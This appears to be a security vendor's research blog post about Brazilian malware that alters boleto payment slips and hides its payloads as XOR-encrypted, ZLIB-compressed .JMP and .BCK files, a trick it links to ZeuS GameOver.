I'm sure you've read or heard about the malware attacking boletos – the popular Brazilian payment system – and how lots of malicious code is able to modify it, redirecting the amount paid to an account owned by criminals. Despite the fact that some numbers were overestimated by some companies and media outlets, these attacks are of particular interest and the Brazilian bad guys are quickly developing and adopting new techniques. Trust me: everything you read about boleto malware was only the tip of the iceberg; our complete research into this topic will be presented at the next Virus Bulletin conference.
The boleto malware campaigns combine several new tricks to infect and steal from more users. One of the most recent is the use of non-executable and encrypted malware payloads XORed with a 32-bit key and compressed by ZLIB. It's no coincidence that a very similar technique was used by ZeuS GameOver some months ago, but this time the files are using extensions such as .BCK and .JMP, instead of .ENC.
We have evidence of Brazilian criminals cooperating with western European gangs involved with ZeuS and its variants; it's not unusual to find them on underground forums looking for samples, buying new crimeware and ATM/PoS malware. The first results of this cooperation can be seen in the development of new attacks such the one affecting boletos payments in Brazil.
A typical Brazilian boleto: using web-injection to change the numbers in the ID field is enough to redirect the payment
In February, security expert Gary Warner wrote about a new version of ZeuS campaign that downloads some strange and non-executable .ENC files to the infected machine. Our colleagues at CrySys did a very detailed analysis showing how this is an effective technique for passing through your firewall, webfilters, network intrusion detection systems and many other defenses you may have in place, as a tiny Trojan downloads these encrypted (.ENC) files and decrypts them to complete the infection.
Brazilian cybercriminals decided to use the .JMP extension in files encrypted in the same way, and downloaded by several small Trojans used in boletos and Trojan banker campaigns. This is what an encrypted file looks in the beginning:
After removing the encryption we can see it as a normal PE executable:
The criminals tend to encrypt the big payload files using this technique, as well as some removal tools such as Partizan and big Delphi Trojan bankers that include images of Internet banking pages. The aim is always to encrypt the payload and make it undetectable, so that it's not recognized as a normal portable executable.
Other files of interest are those with .BCK extensions – they are packed with an as yet unknown application that appears to be a commercial backup app. Just checking the head of the encrypted file is enough to see what's inside - in this case it is a malicious CPL file used in the boletos campaigns:
"refazboleto" is Portuguese for "rebuild boleto". It points to a CPL file
Our antivirus engines are prepared to unpack and detect .JMP and .BCK files like these. These facts show how Brazilian cybercriminals are adopting new techniques as a result of the collaboration with their European counterparts.
Thanks to my colleague Alexander Liskin for help with the analysis.